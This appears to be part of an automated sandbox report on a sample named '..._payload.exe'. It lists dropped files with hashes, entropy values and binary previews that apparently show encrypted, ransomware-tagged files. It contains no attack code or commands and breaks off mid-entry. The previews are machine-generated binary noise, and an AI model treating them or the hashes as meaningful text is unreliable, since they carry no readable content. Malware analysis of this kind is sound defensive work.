                                                                                                Preview:<?xml.C...cdl.f..ey".yS.A.Sz.R..q..k...=|>..2./+.J.....N...)LvJae.Ao....P...W.....N.uJ...._.hv..Q.+*.@#p.~IE.I....~.=.....p8..Z..O.....#D......Y.R..].U".k.i]0."..3..]b.j..w_v.V._0. .g.}R........_.G|h.....|..T_cc.oa=.:.. F$ .-F.V^.5.'.....|..\.hv.$.0.Y-.*?U...w....b.R.^...r.l'9....9wF.\q1..z.u9. 7.<.`...y..?..iD.....$].....H.t..|..\.....F5J,..a}1*.=.@.AsW.nZ.(4be..D?.n...$...7...Z9.d^GS..+s..1hw.....LmT)$~.h.3.Z.>...........E<...8I....T...yI...}4..,.G.Gfuo...5.6..............1..Fk.bzj..P*o.......l.C;q.y.....j...e.:...R.K{...1.M.&.Cw.F..J7..?|..1.. ..I......f.t..!..s.....oV.4.*(....<..ie(*].;..5..!A.1.F..:./....t.M.. ...2...,f.EO.`.;<Ag..Rr.j.v..I.m.If...h.,.........ni.v...H."LF...#...>E...q..P.s..........s3.+)...~..m.p..^\.....mI.....w.....}......T%..k.^~.T$1'..7x..w.r..;;:./G..rL.s:.. Cb|......t.TH.....0i..f.H...._.../B.0.....+wn.Z3.U.3L.d~..O.3`..i=..@.E95|.k..%>.il..]+},...M.;.&.E.L.....I.Z..D.o .zx..>W*..~&Vz?7./..r.Pl. N.eP..)..(2.7#
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1276
                                                                                                Entropy (8bit):7.834787165053912
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:y97wGWsWxJcr4o9czOK7J6/suboz8znzAcBadx3bD:y98lxJcT9cp6/sYkXLD
                                                                                                MD5:215AC096DBBCFD9DDB1B6831E6E8902F
                                                                                                SHA1:8394E5376883561B5E6FE49CDC49410F370DA564
                                                                                                SHA-256:6487C11D86955A90E61C29599B3D98A1CC0F53734DAC8A32D1882EB9FDD3A038
                                                                                                SHA-512:7C76F2E6B8D10DF0F16BB38D33A8D10CEED5C415B511EA484AAD4E04CD21EC12AFF213CA91EFEB58BA05118365AB2C1007BB47F32C93EDFF942A0089740218AD
                                                                                                Malicious:false
                                                                                                Preview:<?xml..U.^....."..kF.. :......}M..W'..{....k..YmO...M.....h.0.....@9?..=b.V.2.-:.].....U....h>.%....i.5:v....f.J6~U..K....k'..3:k.P76..}j.4$p.5.D...[H^'.*3b.0P.^{6....T..4{...d..Y.f...U.^...$...0$...t..)q....p.I.\#.+.........%7.:.e.V..k.p.(~+.<...:8..."LuH.:M...-Hw...q...k..l.)y......4po."Za29J~3..krviT?....G...........O]........9..\...M2I..... .z..v.M....+...........e.....n;.Xi.!k..5!..#6.....E..."...3z....P$.1..v....~f(Y.........`.#`...R..;....[VZ.~l..........t..._....b5....*..9MV....B...c.[.7....;{........|..v..d2i..4........nuk.....r._.I.kK..._R..h...Pz..A...fte...........L..!.....%K.%.U..P.'..2......Y.....<...H.."..s......w.Z..>.V\J.l6.....d..m..#RS.........A.e`...[.k..T.....(/.d..9.......3y...B.UC..w......-.@.e5...l....I....~.c...h.^C...W....o.h=.PV.....zC............sC.yU;.{..ntD.).....L>....M$..=...X.u=.&..|..AP#gt._..h{..#.T!.3?.c....T=.4...Crm.....*.u.....rF.^..,D.UI.|G.{{..s......*.y.......Jt.V.c..;...J.3..9C>!.u
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2037
                                                                                                Entropy (8bit):7.890948462991557
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:DFvEO8gL9W4aGcjuDmiVFgxxqGX8Irl7Wb3c3Q1r9LD:DFvEO8lSc6m0gxEGXtV63cY1
                                                                                                MD5:26A0DF707421E077AC468B29449543F8
                                                                                                SHA1:63641237A1A8840E677E4F2305DE8F6871CB9ECD
                                                                                                SHA-256:A7213A8BD83C210D7B4C9826510931E8A31FE4711C14080D8059B735C7476C0D
                                                                                                SHA-512:CA67BF68CF33A48CD06A49DB87B36B04DCCF61189AB4876C20A5B0F46A39C7A551501E20A049964ED4EC6DDE9DAD2644B14860F30CC5E64D6ABE393674703497
                                                                                                Malicious:false
                                                                                                Preview:<?xml..u.6..|w*hDZ.&....P.....5..9..,<+.;....B.J.b.cZ...I.Ga0..H...Q:......A......"f.5......Rd....#W.V8Ia0P*............b.!..y..W. ^r.ZV,H3.y../.qs...x..Q.!2.5.I.....3+......A.Q*..t....}.a1|"Q.E.......$...R..Zs.;....7......voC5.....i..d.v..8+d+......Dp.].2..)....@....1.6....in..K.".;..We.......I.E...k.qO.Y.P.x..$...+%p....o.....>.`.5.(.R..)S.M0.....{l...n..,.....'tl....0.XA=(W..}.....[..:.%@.JnJ75....4(...S.....tj.$_T..Y..7[..."...db~.nh...(....l.`.tsy.s.<(.\.8...'.....qR&..wHL....R...z..f...U.:jU...$0.e....l.....1.L...Zrg?o..-.Q...1F...,Cd6..;9/.1..(...dv.!..+...r. zI.g:5.9...Rj.b.....H?^..m.X..I.G..I.q3.e..A.......Gj.8G0.s.x.....I.......d.LA.....7...1...D...V..5..h4...<.]Wk.'.7..T.@K.*......k...N.z.K..XU./lP.H6...o..x..I..mH..K...%.=u..I.B.'..`.z.....M..#r....4.+......:j.V..!...j.......\...0.<D*J.Z]UP..y*..(.b...r.D?.$.......2...'a.zO....,.wS.t...A..`..i......... ..~...w.I..b........^-K.p.;m$..'..}...a.[=..^..K.X....}..:hH.!...j.8.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1180
                                                                                                Entropy (8bit):7.812047068330602
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Xl0W55/snng0CagR2TCouALTRER3iRvxJ47iwjwjTFx3bD:10W81Cagdz0TZJ4G/jzLD
                                                                                                MD5:4CF1483C6F25B896A6AAF7EA063CC6C7
                                                                                                SHA1:6BD66A7665DFB8DFC7ADB323634A59EF94BA5B3E
                                                                                                SHA-256:2610CE8308114D80E55F468B8E199730C4C9CEAF14DF790B1083CE91DDC435BB
                                                                                                SHA-512:19115440C87CACE88638CA4B2A97DE63EAC2BBB7086D45B903D00AECE06462CC1D385F88F8FF8840F65B78D064C23B206CB424C7F838651E2B3DC8A659B9C300
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....-1.4.k.e.....4k...=%.uD..$Z.wK...;4.Q.......s.).0.Q......^G.A];R|....[..%{..q..;..@..'..1..>.'x...KBit."6..&.2.l.Q@.....q......>TE..Oly.n...7..........\.#[..Y..;...]=UK.E..3|..4^....Y..X..O..I......j9.X.......r....?GU......w..T.`.^?..G..R.3.slI...rj...}(..B.,3X-v...d..}5X....x....?!.b..H..9.....J$.S.=T.U.,k........s....V.j......#`.\.(......}F.......W "h. lA.8.h...W..}.......V.{..f...FM.(.n...Il......`.o.....d$Z..9$..x!..-...Wm|n.*.y.7.B.4(.N[h.{...54.v&....B..'..%#...:q......4.p.BBs...O}.....I...G@.*E]"..U:..L...Sb.....=6kw..RGb..R$....j=........M.V:.|[Mm...+.......,..O+l.CT../......'..+.KEo)..b^.q..]....@..?.......xg.!.....V....0}.v7.s ..T....{..d._c7.0..R.g$..ak,.e..C...!.U.*z...E...-..4lW....cC].}.......?.S|..5V...X..X[!.....GL..1Q.&.R`Q....:A._...?.M>gU...=~.|.h..(.....>E......R.q....H......BHR".q.M.....D.5Hi!yC..^gY.AV.4.Z-2..9.Ca...a.'.h..\3.t....EU...y......JlV..H.?._.F.b0...S....=..eZ%y.k...v<.s..{..7.V.-p.[v.^..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):899
                                                                                                Entropy (8bit):7.74632393483853
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iR05RvQ4rYN8zXglmDXoxHSVZAWgWs/VLx3bD:iG5Rv/MNKUbloZADWsnLD
                                                                                                MD5:578E6CB37C183C924ABC3DADE6C1CFE1
                                                                                                SHA1:77880E16A3E0EB94CC4B7431FB4F75DBF4050949
                                                                                                SHA-256:82816B97F857DE4B067BA32E55190B5ACBA0DB68C7CC036B88DBF23328FF6B03
                                                                                                SHA-512:61F07DB91CA6A53A578E5DECD48082B771E2C424831E802E2B6598EB867675C4014AB4A0DCD4BC865530FF3BFE11A033B2A06EE97233191AEDF41297EE61602C
                                                                                                Malicious:false
                                                                                                Preview:<?xmlYPZ......V ......E.l.:<<................%.m.)<L.9.va...$.....!...L.LE.(....h....Bf...Y`..n...[.<..."-.(Zl..Y.$.p..T.d,cp..R.`W...}.c. ...... ..sP...oB...\.!..]=.7*..i0S.U..../.{<K.~...k.b.~..u...L$Nh)9....R.....A..H|W%.....#.?.OkIg..0...1.La......$.8;......69e1.x.U..N9..J....@.@.*...`.4.gwq..0B.g.3h[......."J.w.M..c...s<..@.M.H.........%J....[....<...:.i....?Z...].r^d..]...t.S..3.1.. -A.;...U.@_...:}......d.P1.q.,R.9z.p....]...z@..|u..3k..v..Eu.....|t...B...h.R...q#d.O..........C............}....HC...s.y._qJ.....\.{....<......S......d.0.i.y.!.R!........0......'.......'...V..3v...R.U..5.F.1+"X.HB......n..'.I6JS..{!.K1.r........pc..x.l..A..M..N..+..W....$..u.g..^..x....L....t.+.`...#...p>7OX6'..g~.w..%H.;.......+...2..h...d.Lj............ewN0j...M0SMi.7&j....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2224
                                                                                                Entropy (8bit):7.909653219710769
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:HvKqScpro3YFa9+lHVrgRCz6PqZC1rUrRNaeDiOWgxG2qSLD:H1prov9+rWCWyb/z+Oaa
                                                                                                MD5:78B8F18D5FA8603533E48199ADA5784C
                                                                                                SHA1:E7B24AED0A9E9973C063EB4B37EF2450E30A7E0A
                                                                                                SHA-256:D67FFB6FE49C5E3ED34DDE1A0415F848413FAB5F082C0477071013A806A4010D
                                                                                                SHA-512:F2825EF169C5C47FD81908A5F646D42C174C522C919EB08B248412CD5A17B85D2BC8E3618CCF601E00E352B17EA4CA8373C8A0BBFFC8B065624EDD9ABB5439B6
                                                                                                Malicious:false
                                                                                                Preview:<?xml.4....s.)a../.@'.........q...@.......?.aH...DN....<.$L..a4.<v.E...q...FV...w...N.c~..f'v.|x..g.6@!zj.\Z..g...Tq5..&fR.@..;T.e=2..).\.$.....db...(..":......nb..|h.....m{@....]..D.m...t$}..Yk....\.Xz.._{.w... Y..m...YN..6v.....>...6+..mLj9.|..........E....)&..yRFH......6.%-t...#..L.2...h)...d.......k..u@.'Ts....\#..X.....eL{-I..[.wk'...7.<W+?{........%=.!r.."......*...H...x...l...V....w\....(c6.......,1...s.2P....t.P....?s...h.....ue.....<...}.B.=.&%...-...r.XSM.'...-.8O..r/e...r*..S./.....Y9.G..O...#.N.+..........'..0....u.H.I30..68.d...2....P|./...;..._.D$V....o..R.m...Fq..M...$.W....x.O$.U.....\..0.2....6.....E...o......".0.;.........@c..o..+.J..........s...R..1..K<.&=s.....L......S....ubm...M...Vu..;H..c...9........}.g.x.F.\MOx.;.W...eG..).z...J.W|.....t*..J..a...B\Kee.;..l.".9..iiAGAb6.py.b..tl..?..9.cVdn..)L..`..4.q......r....g.....w3g.vH.,.i..$i...v.y.Z.].....G~....3x.....sn....s..S|.&*..f.Y..X.2...y....?.J<.g\$
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1560
                                                                                                Entropy (8bit):7.861312790053527
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:jbrwZ7ywguSXNOaeTauC7Vz2oZZHeCdaqUMUzzi8LD:XrwZ7yw9SdOajuRoZ4HbzziY
                                                                                                MD5:161BF5497F5D335C4C3102752E514A8E
                                                                                                SHA1:62C1CB9DCCAAFF1A2B996EE511D110775092C378
                                                                                                SHA-256:87F07689D8CE617392912641C0925144D0CD0D40E18BA9F8BF31CAED382E185F
                                                                                                SHA-512:0374525C5397E4D9AF35314BE63861947E96479DA1B29B15E46796EC9A61C5F5DF6FA177E7F2F1D37E810A88BAB55593B226DCEE422FD9111DBD531F5D3C3952
                                                                                                Malicious:false
                                                                                                Preview:<?xml(.3.E...&_....CB...@N..Z}C..@.y...r.8..n..Mn<...J> h...r.....<xJT6s...-..MI"..P...D.........Ne.....D.A...84.....<...g.L.`..4ZD......Fb|.I.....7.l.?].hYY.bXx.....M.1j..H.N..Q..&C.....x+S...8..4Ib../...q.....[.....^0..FNZ...l.L\.2W...:..4<m8.x..8.j&....e.v1nD9...,/.....Z...dM...6....{..t'.5...... x. ..Yi....\aT).....x.HL.........Do......F)%O..5.ch..N.s.qb...i.G....Q...Bz.........y...-f|zC........kkm...i.n..f..Yj.._..Y>"....i-t..xZ%..3.Ag?6}.sd...xBn=*...|..j.g...wW>.[.j.\..k>.8..."D...q{F)....B.vR..!S.y..K...QmG...`..p.m....H....M.am*yPb..ur....7\R.T..8..;..d..S.....`.....GQQJ.4..?...9"...~....A..MNww...(f..m.TS..l..R.M..|{].c0v.0.F.J..17cE.....9|......3f.B.(.@...T..Pd.=v/.*.'.....?eE;.b^..Saqe..W.Z.....s......#_.0..q.&Yl..._.G..v..e.. .W&).R..4/....(+d.}.Ec.....r... ......}.....&R..`...>9.w..<*Z,v.Q.&...9..yE.+..'.....I6.. .?>M.2g.\.._..IxP./+..'.0....H:^..sa.v.>.\.!>.%.&O...j.c;..[...h.N@.o.|>.....O...Z..h..]Z...R...h!Z......a......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1206
                                                                                                Entropy (8bit):7.81602192484521
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wk7OfyUuuhC2WZN4ShA5w0qLA+FlAmppulciKgl83UL01Bb2arja5x3bD:y8FY5pqLRlZT6QM8EL0m7DLD
                                                                                                MD5:54F36639E2EFFAF7E6AB97F35E3BCAC2
                                                                                                SHA1:635E9A34FF0D8EF8AA0899539C2C3662B8A746E9
                                                                                                SHA-256:AF0F3ECF389DDAA8DF3A914F63FF379797F380768CC8E8564C9BBE579DB3D0FD
                                                                                                SHA-512:9DD7C151B405A82D10922ABAB99A27DDA7BDFDB45EC7D19BC0B83CE5434553CC25BBCBC42BFB5238C507344DD8D3E434A5F08189BAAF85DFB36EDF2B61FC58F1
                                                                                                Malicious:false
                                                                                                Preview:<?xml..1.^.....z7...y../Z..`.E.....V.3$.y.c.!......-.VV.Y1....8z\.u.k...g.A.C.K#......U!........a...a<D..5.\...U..X.V..;zK..?.u.....fG.b.....A....1N.....8..t....... ..uU-..)...A.R.*.aZRgo....r.C}}..[7.;..^.~n.........J.2%.}.......g./]r......SD4U.x.)%.......lB&.\.1}.....7A.....W..s(..=..O..w..........K.`..&..Z.5.fH...N.t..j.n..:~.P...\....@CK.:I...,.o.....&e..A.a..(..:{...)...7."..........,?.....`.,......c>Ej..g~.{.w.?.t.u.....}.....7...,3....JO..%s.2.F.._d.a..D N\...q.X.i.)..U...0....5......t.Y.bn....... QJ....G.9.w......p.:<8NR=....`...L3i.k.......U....6.Y.r..i.!*.$z......V..d.0.,.f......G..*.......P.r....p..&=..>..Kv......5...7....#Z.\/..RVd.GI.V....."...H._.......;]OX.S.G..S...O..u;....m...+l..6K.! ....{r........~.v,)...1...$.4#$.,.c...."s..S.........q..C...4xz)n.of..0.kV..KeF...L..Rev.B.3..~..........}4.0.........9$.".../.u...{J0.V=..\.....<..u.p...a.B....S6.^.....d..6j.$..=*...9.n.l.k4k....R..=.4.":.(<y....M<.F .;..+$.5..SEu.}.>....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):738
                                                                                                Entropy (8bit):7.715605723013453
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:SJVlaBOsDEANrmr1GMJ6zB+VLtQMB9cyxGhvttK2lppysX7O/pj/luHU1C21gJcn:WatQdBb8Bi9aHhvzK2lpQ6a/pj/8H+C4
                                                                                                MD5:16F342DC9739ADBD78371E17B85E4DE2
                                                                                                SHA1:1102A03FC0B20A0B0522D6AB550B8B0BD122800D
                                                                                                SHA-256:1544FF94237AC3554ABC05B422EA71C1711BD88790B16D1B648DC23131B9A851
                                                                                                SHA-512:527DE0D71A86934305418348F45D4CDC680E4FEC8C857CE1BCAE3F2E02C29F8A826ACF590625DAA0253820B2599CE126A5CADAD15C08CFE19071EF081FC124D3
                                                                                                Malicious:false
                                                                                                Preview:<?xml...D....k@..>7+................h?..M6-....,.TL...Dy.$.\....:.p.N.gM.W.-&}'jzMN[...j1..1.f..k.]J3...r.V;...d...N.....I./...Q...F..R.t]......m`.w....x......i.n.#...!..l.'..y1Gw.yl<..U.0.A...LH.....#........:RL2.7.2..1,..A.Lf..v..G]..zd ...........^..lL....T.......Jz.9.\.g..|.q+a.P............'5}?C..'.A..h.x'...2....v..g...@y.'..c...SD....GZl_...Tx.0&\..e..U.V....M?)E#..?...Y....g,.4.[.4.q.?......df.T....J....e.d.^"...#:....@..Fqv.........7...b..=.^/2.|.7?.........v. P...cZ.):....Et.lU:....Y1..n..Sv....1.....z.........Go....LO.c.I....... >K.....T.4...&+...t<A..K..jZ.M.cMg @.&=dU/.(.~..Ge0QB.B.Y....o..K.$W......].v.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1044
                                                                                                Entropy (8bit):7.804868569968243
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:lFzIxEpSViYTOyWwCDgqGlVe3qhMucFjNQx3bD:b8xEJYezGlVe3qhLD
                                                                                                MD5:8D9DD49D96EC5167ED62F74146E235CB
                                                                                                SHA1:AA5E9C956F341DA30371D9EDED90C85766416D4A
                                                                                                SHA-256:FAF73DAB06AF53FAF292A160B8FCFD2E7DC792DE5FD3675944AB26D983772921
                                                                                                SHA-512:8E42510FA5F81CCABAE73CAD49EB8E8B36DB353AEDB35D178BF9EFD636D4FD6834135ECA917EB73599E4D4BE89BF596DF37607ACBF9DF89919656333A4F2ED04
                                                                                                Malicious:false
                                                                                                Preview:<?xml..&.M.cD.8.e..;...h..../..sT0.|....&..u;y...).."m..O?.@....J.........+.0o..h.3b...0M...i.H.C.*....g...:u........n..^..E..hGa5M..WX.....e%...[...t.A..cza@..&..7P.G....j'.[.<.....:M%0..e...%.O.w)U_.)........#P...W..x....5..B...s~...-.xhHCR3...%!_..u.n.+...{....%Z.....1..7..(..M7.d3...P&....@.VrA..7n...G..*c..P.....O..rS.`..... -..=..D./.wv.....v.....AU...ESO.....3....P...C(.....x..D@H8..0...f.N#. A.N ~.rQ..\.....c...i..s...Kj....k..@./..'.K~..4. .u.(..@..0.....M.F....o..............oR..k.0)-W.F.....*go...wa(..L.B.9>...1dp..2+..<!#SQ....SFr....l..1.f..2.!v.XV...:/.s.`9....s.....k|@.. ....$.....h/.....a{*....E..&f...s.......@....eq.H"..~.q....t..5...Y......7.pH.0l.G.}....ID}0<3...R...6....xw...1.Z.....#...9BPKM..L#.^s."....A..Y.....p........;.]..'......L....Ix....iZ.y..@.+..U......W.4..>..O.iW..*...9..;8.;T..35...~rN0..q.....|.OY.....c..)..[.F..M&iA.f@....".`W.iF...Wx...........$....!o..v.v.WBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U8
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):862
                                                                                                Entropy (8bit):7.713361915244485
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:HkaYfwLGz7giZQMINJ7XGphI9TApYhIXrATfEtBVitb70rJpspF7wsXtPgJc3ciD:HkPf+Gf9ZQpJ7B9ThqriC/itxH1x3bD
                                                                                                MD5:C6ED79E685CF6C389A43A313F40D4196
                                                                                                SHA1:1F9E085CFC6E247E191AE917BC38648266D3C9AD
                                                                                                SHA-256:D79463DDDC0E55EAA899B743F70A793518F0F21BF360CA89E40FFEEE148E767B
                                                                                                SHA-512:96DCE75CD20CC9D155283880DB6C047245940B33E90BA3A3D07095B650D8CFC35B679BA52F53BB8E69F5DD56A049A139CB43BBE70D78A539DA99570A5F7E5B07
                                                                                                Malicious:false
                                                                                                Preview:<?xml>..U..Q.O.lh3?...n..[..^.(.`.....9 "%..Z\....B..(h..c.U.h0.2.[e.....w.........R.m...=%__^..3.....$O.JN.J.6..s...n"...W.........6VJ..`2&.Y......2z...a.........w..D..ZO..s.n.7....(`..J.[.~%...&1.M:..E..J.~Z......,.....!.`"T..kH2v.y.rQ...a.+..R.!..B..#76..0R`'.QJ.kl....)J.>...f....b.....n.n....Y...._.}8:...5rl...n!..d..^...Y.[;E..u.5.i'..........j....:.}7.....x.:.).....g.N`..-/....h&..Y.<T......'.C..G...^g.Y9|.o..4V..5.....xh..v.@9....rk...ib{..t.d.S...+..*.D.N.RO.......2..W.f._.Q`.@..%..?...2<. ..d.\..6.R&.Q..(.>Wa.wQ..n.g.2.h...O..j..5..=.g.......|.Jj.3r.(tx..[.G.1n%...?8gD2....X...B.V...fc"......Q...g..k>':...."5oCV...j...<.....'7.G..RO..........7..}.........a...T.....w..f:..B.b...Ax..;v4`...xp.....l@...2U.z.}.R...6.Xr)).w.V...N2.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.893216372582541
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:jH0Mo5MvPHmmWEgMK1LIrA+I+BS9ncULD:VoA35bnrlB4n3
                                                                                                MD5:78D98F7E86655003CB9D95E49BD93D47
                                                                                                SHA1:27D9D2A4931A57B441BC2548325636F0794E9BFB
                                                                                                SHA-256:73E04982A79BC7496CF9A7CCF65BB812AA6AC0CC4E0CC0B5CFE1412B6BC15075
                                                                                                SHA-512:AA97476D56555E8F279296EDD2E6DABF2A1480C4037F2B8605F62E169CE3358725C11E64C764E908F688D0D3E88AD800A310A685F2A4CB72F8211D8B2BD979AD
                                                                                                Malicious:false
                                                                                                Preview:<?xml...e.T....cZ.9....X..C<g.!..f3.~Q>..`$R.:..GS....0.SHn./f.P\.P#-.CC....v.ju.......;+..y.q...|.#a....2....e....:+.@..f,lz{.jg.E?.&.oQcR....M...B....EW.".He.Jj.."|..y..X....dBE....1...2......v.3J............$./,..p...).;......7.pW. ..).e)%....:.=j.'.7g...0...x... ..5.V...l<....Y...B..4.C..VV.u..EOg..;@Lq.!b..r.}.f't....?.J....y...w.r..$....6.z~3.=v.~-..om./....d....N.../|......S{[....zL]Dy''...B_...8...U..Q....ON.....M...."....4.A.&....O.@.y=%...`....%.1.@xC.1.x."k.%T...X.>.k)kD...#D9..~..crl.Ir......-.....P...cPV..V&....V.x..NC...:.i.p.F.N....m...'.*.~D}.....1.+..FV..0crP..5.....ba....I*..F....... ......l....A.";nG..z..uI.s.....K:...T..^.P.v-]..)....7a....m.B&....Q.j.....F^hp..,..1i?:.E....*]..SnW.....qwA..o.x.........-.:.w..j....G.."...Xu..%..&..N.\?.;....|..x..._..l.Y../D.G.:............9.U.&.n..O.K..p@..Z..;..q@..Bf..F...m.P.1...%|.~{......l..Ax*c.S..w.~&3....%..0.Zw.3..^...3A..w..Z}.z.(X...a.....T.(......9Cx.^J.~..+tx..m......f.cI.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1699
                                                                                                Entropy (8bit):7.865702622113728
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5eULPeJn0sTbTsK5VKS5b84h2shfoD/l0xUDbMIYg/Wc6plNDrUOBzH/mx3bD:wuODTkKlF8ZshADt0xU/MIYWWDpr50LD
                                                                                                MD5:E6C0064AEBA4D05BF3F26EA87D45C165
                                                                                                SHA1:4EB9378E6D8E3737DBA262EB4363036948B36511
                                                                                                SHA-256:8CF633EC4A674BC74892873876BF5DBEB2B7CBB2AA86A111C5702CE2D30DE42C
                                                                                                SHA-512:023DC982AF252BD4D7EA265DD27E08FF3449D73EA214D47FA71EC13EA90F355F8E5A30C8A2CD30250ADF4BA3E0F6C06C5D23E7E54CAE69463D1060E4A0BFFFA2
                                                                                                Malicious:false
                                                                                                Preview:<?xml... N.......Xj2..f......).1y..]X...j....>%...+......P.q.w..O.....'.V..s.4..+..-1.Cf..=. .B..].N.:..-<.>./[h..6.q..X..4......l.P...KSl....l.+....../.(.v..!J./..OS...)..qxS...Vo..,...G...*..2!'T.B9z.XM.K.;...(.fc.J.X:....t.x|I....f...T.I.U...O.|Tv...,...p..,.Me.HFa.....0j...OQ.M.....tn.#.&.~...s.xY...?-.6 .{XN.v.0....gV.9.h.h.....1.rY..7........3".._.P..t.[Ltn7:.........=.^co..I......(.....D....U.....;]..j...Ub8L..SI.Q&H~b..bK.)..M.W..@.]=.R.....<.".X\L~H.vS...K..T. .H...i.....X.........q.$..D.k.:.Q.>.{}f..&..t..3.4.8$...e...].I.......\....+OY7..K.=j.v...&.."].x.5h.)I....Z..d...\...(8..(.?_....bL).sIbI.R.U.....4dM...lP\hsG.....v.f..o.R.'4.w./.....X/.ch...c...a.._K.w.1..NZ..QVU$xA....`..;...~..hz..@.].D :.e.].......E..'.Fh.\.... .U'F....w.zn...4.].5..r.... ...}..6.;R.L..af...=...+..|-b.l,W.....Y5.O...d...r.[.j..+b..xS;....(.B..7..=.?&.t...|B...8A.PJ.|.L3Y..BU...!..LZV.;v.9..<2.!..L...m..:...lT. wN......)....T..H..,...+]I....=.%.r...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1736
                                                                                                Entropy (8bit):7.880801985105482
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OsfHZ7Zuy47JVunQyvy3cnzPE0C2HvBQ6LZo8DQ6/LNG7qtvJKRtL9Oki0P7ZFgZ:OoHZ47/+Q+MjMvhPQFaARtZOkiiF4LD
                                                                                                MD5:55CAFAB60CB3FA5B8C470E3A7A2687BC
                                                                                                SHA1:E25311EDD9A09EB0F144DB800C7E8B2997226860
                                                                                                SHA-256:73907B2B20CC9B99781065380C08C85F609DCAC53E6CC156271057E2E86D9864
                                                                                                SHA-512:064741506C9EE78300E8D3F6EAA86F730AD7E7E959168A1846E54689038196A1DF7B498BBE0BC1FCC94A9E378143A511500710101BF2CF2FF7CA7164DDA025B0
                                                                                                Malicious:false
                                                                                                Preview:<?xml.??>1...F...(......... .dy..K......^"^..#....(....M-A.j...|..6P_[...'..FS....m?dg.~H%...M,.A`. Q..4...@.....a>..R....50y..8..<.I.V!._c......`.oA......[..E.1n93...c.T.5.$...+5^.V..X..._...YWq,h.t......L..z.e....W....H.L.nE...hm.~.....M]G.&......L.L..d..y.. .....hy.7./..:....Dq...O...i&'....B....f"....3.....o*qX+.<.8..b6.....z..'YF.....e8.....`...X.k.<...tp\#.Z])x$....4...g..).Jc.@...sp.y......'Z.g/..3{.).W..\.(3.^..h."...|B...(..F..%1....fQ....U].X.w..U]...C.'u..u..n...-..."...S.^I...1t..Z%.g..b7...L..-..>aB.=...W.....5....JY...*....wS.nx.9.w..Xnp!....$..."of.6.H..r%0.IW ..eK.R.Z ..4}6..M.ji...._.}....5.c....3.%D. ..]..yQ.a..<.s%1.U...0.}...s.kl...?.......tV.}.Q....=.....K....a...r.cO.,.......|...j.h.`..^..g..j{..8=..nQQ...?l...~b..L...k.U.g.#..5.....l......k...L|..fI*.H...uG... .l..u.Pe...w.?nO...._.@....".Q......Yc3.E_.n....n.6Lqy..R...da.7i.Oe!..k.o.....~..^%V..S.&.Y....J..W:.z.U3.^ ..(5=...S..0/.h.!I.W..0.M....n.......(....i.`.O>Ug.5}.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):7.864576323906651
                                                                                                Encrypted:false
